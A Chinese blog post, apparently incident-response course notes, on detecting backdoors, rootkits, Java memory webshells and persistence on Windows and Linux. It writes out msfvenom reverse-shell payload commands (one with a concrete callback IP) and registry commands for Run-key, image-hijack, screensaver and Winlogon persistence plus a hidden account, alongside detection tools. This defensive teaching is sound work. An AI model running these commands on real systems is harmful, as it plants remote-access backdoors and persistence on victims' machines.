应急响应-后门攻击检测指南&Rookit&内存马&权限维持&WIN&Linux

最新推荐文章于 2024-05-07 16:50:44 发布
最新推荐文章于 2024-05-07 16:50:44 发布
阅读量349 收藏 3
点赞数 4
分类专栏: # 应急响应 文章标签: 内存马 权限维持 rookit windows linux 后门检测
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_60571842/article/details/137523606
版权

一、演示案例-Windows-后门-常规&权限维持&内存马

1、常规MSF后门-网络连接分析

常规后门:

msfvenom -p windows/meterpreter/reverse_tcp lhost=xx.xx.xx.xx lport=6666 -f exe -o shell.exe

在这里插入图片描述

2、权限维持后门-分析检测

自启动测试

REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "backdoor" /t REG_SZ /F /D "C:\shell.exe" //把shell.exe放入启动项并命名为backdoor

在这里插入图片描述
在这里插入图片描述

隐藏账户

net user xiaodi$ xiaodi!@#X123 /add

在这里插入图片描述
可以使用PCHunter工具查看当前系统用户
在这里插入图片描述
或者

运行-lusrmgr.msc-本地用户和组-用户

在这里插入图片描述

映像劫持

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v debugger /t REG_SZ /d "C:\Windows\System32\cmd.exe /c c:/shell.exe"

在这里插入图片描述
可以使用PCHunter或者火绒剑工具查看
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

屏保&登录

reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v SCRNSAVE.EXE /t REG_SZ /d "C:\shell.exe" /f //进入锁屏后会触发shell.exe

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /V "Userinit" /t REG_SZ /F /D "C:\shell.exe" //有人登录这台计算机的时候就会触发shell.exe

在这里插入图片描述
在这里插入图片描述

3、Web程序内存马-项目检测

Web层面:通用系统层面
1、常规后门
2、内存马(无文件马)
    PHP(不死马)
    .NET
    Python(少见)
    JAVA(最多)

在这里插入图片描述

哥斯拉内存马

在这里插入图片描述

自动化项目

https://github.com/c0ny1/java-memshell-scanner
在这里插入图片描述
在这里插入图片描述

在这里插入图片描述

二、演示案例-Linux-后门-常规&权限维持&Rootkit&内存马

1、常规MSF后门-网络链接分析

常规后门:

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=47.94.236.117 LPORT=7777 -f elf >shell.elf

netstat -anpt

在这里插入图片描述

2、Rootkit(内核)后门-目前开源的检测项目都不好用。

权限级别非常高的后门,常规查看网络链接命令是看不到对外链接IP的
windows也有rootkit后门,但是都不开源,而linux是有开源的rootkit项目。

3、权限维持后门-项目检测

GScan
https://github.com/grayddq/GScan
python GScan.py

4、Web程序内存马-项目检测

Web层面:通用系统层面
1、常规后门
2、内存马(无文件马)
    PHP(不死马)
    .NET
    Python(少见)
    JAVA(最多)

在这里插入图片描述

哥斯拉内存马

在这里插入图片描述

自动化项目

https://github.com/c0ny1/java-memshell-scanner
在这里插入图片描述
在这里插入图片描述

在这里插入图片描述

SuperherRo
关注
  • 4
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Hacker Defender ROOKIT木检测工具源码
02-25
Hacker Defender ROOKIT木检测工具源码
应急响应后门攻击检测指南&Rookit&内存&权限维持&WIN&Linux
今天是几号的博客
04-24 1067
主机层面后门&Web层面后门&权限维持后门。主机层面后门&Web层面后门&权限维持后门 # Windows实验 1、常规MSF后门-分析检测 2、权限维持后门-分析检测 3、Web程序内存-分析检测 常见工具集合:
应急响应-163后门攻击检测指南&Rookit&内存&权限维持&WIN&Linux
wuqingsix的博客
02-14 441
可能的后门存在:启动项,隐藏用户,映像劫持(打开记事本操作成为了打开计算器-修改了注册表指向),屏保,登录(只要有人登录就会启动后门)rootkit后门:(后门为内核级-抓包工具是抓不到后门流量的 -普通抓包工具权限不够-小伙子把握不住)常规msf: 查看进程:netstat -anpt,找到可疑进程并kill掉即可。java两款调试工具--可以在内存注入后就能看到相关信息(产生的类...)常规msf后门-权限维持后门 ++分析检测。2,内存(无文件--内存查杀工具。
第163天:应急响应-后门攻击检测指南&Rookit&内存&权限维持&WIN&Linux
qq_46081990的博客
07-06 596
1、对于系统层面的后门:对于常规MSF后门,其一般会有网络外连的情况,可使用火绒剑、PCHunter工具查看网络,针对网络外连的进行逐一排查对于权限维持后门,比如自启动、映像劫持,在火绒剑、PCHunter里也有对应的栏目,也可逐一排查1.2、linux对于常规MSF后门,其一般会有网络外连的情况,可使用命令:netstat -anpt 针对网络外连的进行逐一排查对于Rootkit、权限维持后门,可使用工具GScan、rkhunter进行排查2、对于Web层面的后门:2.1、普通Web后门
163、应急响应——后门攻击检测指南&Rootkit&内存&权限维持
qq_55202378的博客
03-25 817
后门查杀主要查杀:web后门ServletFilterListenerphp内存,先杀进程,再删后门就行了。主机后门权限维持后门
2、应急响应-后门入侵检测&Rookit&权限维持后门&内存
m0_65842464的博客
01-23 492
不同后门类型: (1)、主机系统常规后门,例如:MSF远控木,CS免杀后门 (2)、权限维持后门,例如:linux系统的Rookit后门 (3)、Web程序后门内存
权限维持】Linux&Rootkit后门&Strace监控&Alias别名&Cron定时任务
今天是几号的博客
04-16 1185
alias命令的功能:为命令设置别名定义:alias ls = ‘ls -al’删除:unalias ls每次输入ls命令的时候都能实现ls -alalerts'这样目标执行ls命令后可以上线,不过ls命令会被阻塞在那里,很容易引起怀疑,当结束终端窗口时,反弹shell的会话也会随着被终结,而且更改后的alias命令只在当前窗口才有效(重启也会失效)2、升级:))";alerts’进行base64编码是因为python程序有空行和空格,将一段命令转换成单行命令。
应急响应实战笔记——权限维持篇:④ Linux权限维持&后门
君逍遥o
04-02 808
首先启动的是/usr/sbin/sshd,脚本执行到getpeername这里的时候,正则匹配会失败,于是执行下一句,启动/usr/bin/sshd,这是原始sshd。这个子进程,没有什么检验,而是直接执行系统默认的位置的/usr/sbin/sshd,这样子控制权又回到脚本了。它通过提供一些动态链接库和一套统一的API,将系统提供的服务和该服务的认证方式分开,使得系统管理员可以灵活地根据需要给不同的服务配置不同的认证方式而无需更改服务程序,同时也便于向系统中添加新的认证手段。如果匹配成功就可以登录了。
应急响应之Linux权限维持--后门
明哥哥知识分享
01-14 720
本文将对Linux下常见的权限维持技术进行解析,知己知彼百战不殆。 1、一句话添加用户和密码 添加普通用户: # 创建一个用户名guest,密码123456的普通用户 useradd -p `openssl passwd -1 -salt 'salt' 123456` guest # useradd -p 方法 ` ` 是用来存放可执行的系统命令,"$()"也可以存放命令执行语句 useradd -p "$(openssl passwd -1 123456)" guest # chpasswd方法
Hacker_Defender_ROOKIT.rar_hacker_木_木 扫描_木扫描
09-22
检测工具,针对端口扫描等一些比较典型的攻击行为,代码比较简单,适合初学者
ROOKIT后门工具
06-21
网络技术后门工具。检测,比较好的工具。欢迎使用
OpenArk:OpenArk是Windows的开源反rookit(ARK)工具-Open source
03-25
OpenArk是Windows的一个开源反rookit(ARK)工具。 Ark是Anti-Rootkit的缩写,它旨在反转/编程帮助程序,用户也可以在OS中找出隐藏的恶意软件。 将来将支持越来越强大的功能。 特征 进程-进程/线程/模块/句柄/内存/...
Android-Rootkit:适用于 Android 的 rootkit。 基于 Phrack Issue 68 的“Android platform based linux kernel rootkit”
05-30
文件名: sys_call_table.ko描述:这个 rookit 是为了拦截以下调用而开发的 SYS_WRITE SYS_READ SYS_CREAT SYS_MKDIR SYS_RMDIR SYS_KILL SYS_OPEN SYS_CLOSE SYS_GETDENT SYS_UNLINK SYS_KILL
专项技能训练五《云计算网络技术与应用》实训7-2:使用OpenDaylight界面下发流表
艾泽拉斯科技屋
05-05 1077
其中node id参见之前查询到的Node Id。table id和flow id可以自定义。由于OpenFlow1.0协议只支持单流表,所以这里的table id设置为0,如下图所示。说明:priority设置的比已有流表项的高,而idle-timeout和hardtimeout都设置为0则代表该流表项永远不会过期,除非被删除。其中源地址填写主机1的IP地址,目的地址填写主机2的IP地址。说明:由于使用IP地址进行匹配,所以需要设置以太网协议类型。
C语言双向链表如何实现向指定索引位置插入元素
Python私教
05-02 388
【代码】C语言双向链表如何实现向指定索引位置插入元素。
深入理解Java泛型
m0_59925573的博客
05-04 568
max = e;return max;泛型为Java语言提供了强大的类型安全支持,使得集合操作更加安全和灵活。理解泛型的使用和原理,对于编写高质量的Java代码至关重要。这篇文章深入探讨了Java泛型的使用、类型推断、通配符、类型擦除、局限性和高级应用,适合那些希望提高自己泛型使用技巧的Java开发者。
linux设置挂载指定的usb,自动挂载
最新发布
A-Itfuture的博客
05-07 451
使用udev规则可以提供更灵活的控制,例如,您可以在脚本中添加额外的挂载选项或条件。在Linux系统中,如果您只想让系统挂载特定的USB设备,而忽略其他的USB设备,可以通过创建自定义的。另外,如果您想要挂载特定的USB设备,您需要在udev规则中添加挂载命令,或者在。创建一个udev规则文件,当指定的USB设备连接时,自动执行挂载脚本。首先,您需要确定您想要挂载的USB设备的属性,如供应商ID(命令列出所有已连接的USB设备,并找到您想要指定的设备。找到您的USB设备的条目,并复制其UUID。
获取Java 虚拟机进程ID(java应用进程Id的方法) Linux & windows
weixin_44131922的博客
04-30 505
这个命令会列出所有包含"java"的进程信息。从中你可以找到你的Java应用对应的进程行,第一列就是进程ID(PID)。这个命令会列出所有包含"java"的进程信息。在输出的信息中,你可以找到Java进程及其PID。替换为你的Java主类名或jar文件名的部分匹配字符串,pgrep会直接返回对应的进程ID。如果你需要在Java程序内部获取其自身的进程ID,可以使用。这段代码会打印出当前运行Java程序的进程ID。
网安术语:一句话、小、大、webshell、提权、后门、rookit、源码打包、脱裤、暴库、嗅探、社工、poc、exp、cve分别都是什么意思
05-31
1. 一句话:一种常见的WebShell,指的是以一行代码的形式将一段恶意代码植入网站服务器,从而实现对服务器的控制。 2. 小:一种常见的WebShell,指的是以一段代码的形式将恶意代码植入网站服务器,从而实现对服务器的控制。 3. 大:一种常见的WebShell,指的是以多行代码的形式将恶意代码植入网站服务器,从而实现对服务器的控制,并且具有更加复杂的功能。 4. WebShell:一种通过Web应用程序实现的远程管理工具,攻击者可以通过WebShell控制受害者的服务器并执行恶意操作。 5. 提权:指攻击者利用各种漏洞或技术提升自己在系统中的权限,从而实现更高级别的攻击。 6. 后门:指攻击者在系统中留下的一种隐藏的访问方式,用于在未来的时间重新进入系统并执行恶意操作。 7. Rookit:指一种隐藏在系统内核或应用程序中的恶意软件,可以实现不被发现的控制和操作。 8. 源码打包:指攻击者将恶意代码混淆或打包成不易被检测的形式,以逃避检测和防御。 9. 脱裤:指攻击者获取受害者系统中的敏感信息,如密码、账户等。 10. 暴库:指攻击者利用漏洞或弱密码等方式获取数据库中的数据或控制数据库。 11. 嗅探:指攻击者获取网络中的数据包并进行分析,以获取敏感信息。 12. 社工:指攻击者通过社交工程手段获取受害者的敏感信息,如密码、账户等。 13. POC:指“Proof of Concept”的缩写,指的是一种用于证明漏洞存在的攻击代码或脚本。 14. EXP:指“Exploit”的缩写,指的是利用漏洞实施攻击的代码或脚本。 15. CVE:指“Common Vulnerabilities and Exposures”的缩写,是一种公开的漏洞编号标准,用于标识和跟踪漏洞。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

SuperherRo

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值